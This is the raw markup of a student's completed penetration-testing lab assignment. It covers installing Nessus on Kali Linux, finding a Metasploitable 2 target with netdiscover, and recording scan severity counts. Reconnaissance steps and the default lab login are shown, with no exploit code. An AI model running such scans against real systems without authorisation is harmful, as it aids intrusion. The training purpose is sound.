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Rule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:after="60" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f4e79"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f4e79"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Penetration Testing Engineer- Hands-On</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:after="60" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CYBERSECURITY PROJECT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:spacing w:after="60" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ON</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:after="60" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Assessment &amp; Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:after="60" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="lightGray"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Batch 14</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="lightGray"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instructor: Rashadul Islam</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:after="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>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MD. Robiul ISlam Rubel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2023200000409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16/05/2026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0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Rashadul Islam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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Lab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Kali Linux + Metasploitable 2 on Host-Only Network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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">VA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Nessus Essentials (free) – running on Kali Linux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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Date of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18/05/2026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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Time Allowed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3 Days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:spacing w:before="320" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="c00000" w:space="1" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="220" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="c00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GENERAL INSTRUCTIONS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Read all instructions carefully before starting the lab.</w:t>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Do NOT skip any steps — each task is connected and should be completed in order.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Make sure both virtual machines (Kali Linux and Metasploitable 2) are connected to the same Host-Only or NAT Network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Take screenshots of every important result, as screenshots are required for grading purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Clearly label each screenshot file, for example: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">va1_nessus_scan_complete.png</w:t>
      </w:r>
    </w:p>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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All answers and findings must be your own work. Do not share results with other students.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:spacing w:before="160" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="1f4e79" w:space="1" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="220" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f4e79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB SETUP (Complete Before Starting)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2e75b6"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Metasploitable 2</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from: https://sourceforge.net/projects/metasploitable/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into VirtualBox or VMware. Set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adapter to Host-Only.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login — username: msfadmin  |  password: msfadmin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2e75b6"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Kali Linux</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set to Host-Only adapter on the same virtual network.</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the target IP: run</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netdiscover -r 192.168.x.0/24   on Kali.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2e75b6"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Nessus Essentials (install on Kali)</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free at: https://www.tenable.com/products/nessus/nessus-essentials (you will receive a free activation code by email)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the Kali .deb package from Tenable, then install: sudo dpkg -i Nessus-*.deb</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the service: sudo systemctl start nessusd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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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on Kali and go to: https://localhost:8834  — complete the setup wizard with your activation code.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10–15 minutes for Nessus to download plugins on first launch.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:spacing w:before="10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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET IP (fill in here and use throughout): __192.168.242.129_______________________</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="1f4e79" w:space="0" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f4e79"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SECTION A: VULNERABILITY ASSESSMENT  (50 marks)</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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, you will use Nessus Essentials to scan Metasploitable 2, analyse the results, and produce a structured VA report. You are identifying weaknesses — not exploiting them yet.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:spacing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800"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="75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60.0" w:type="dxa"/>
              <w:bottom w:w="80.0" w:type="dxa"/>
              <w:right w:w="120.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">VA Task 1: Configure and Run a Nessus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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[20 marks]</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:spacing w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What you need to do:</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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log into Nessus Essentials, create a new scan targeting your Metasploitable 2 IP, run it, and record your observations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:before="12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Nessus, create a new Basic Network Scan. Fill in the details below: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03B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Scan Name you gave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3C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable2 Scan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Target IP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3E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.242.129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Scan Policy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40">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Basic Network Scan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041">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Date &amp; time scan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42">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">18 May 2026 Time: 02:02 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043">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Date &amp; time scan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44">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">18 May 2026 Time: 02:16 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045">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Total scan duration (approx.)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46">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">14 Minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4043363" cy="253066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43363" cy="2530669"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> va1_scan_config.png</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:spacing w:before="12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scan finishes, take a screenshot of the Nessus summary dashboard showing the coloured severity bars (Critical / High / Medium / Low / Info). Fill in the counts below:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">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0000" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">08</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1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">03</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2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">31</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3">
            <w:pPr>
              <w:jc w:val="center"/>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4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">132</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4529138" cy="2167263"/>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29138" cy="2167263"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">va1_scan_summary.png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800"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="75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60.0" w:type="dxa"/>
              <w:bottom w:w="80.0" w:type="dxa"/>
              <w:right w:w="12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VA Task 2: Analyse Nessus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b w:val="1"/>
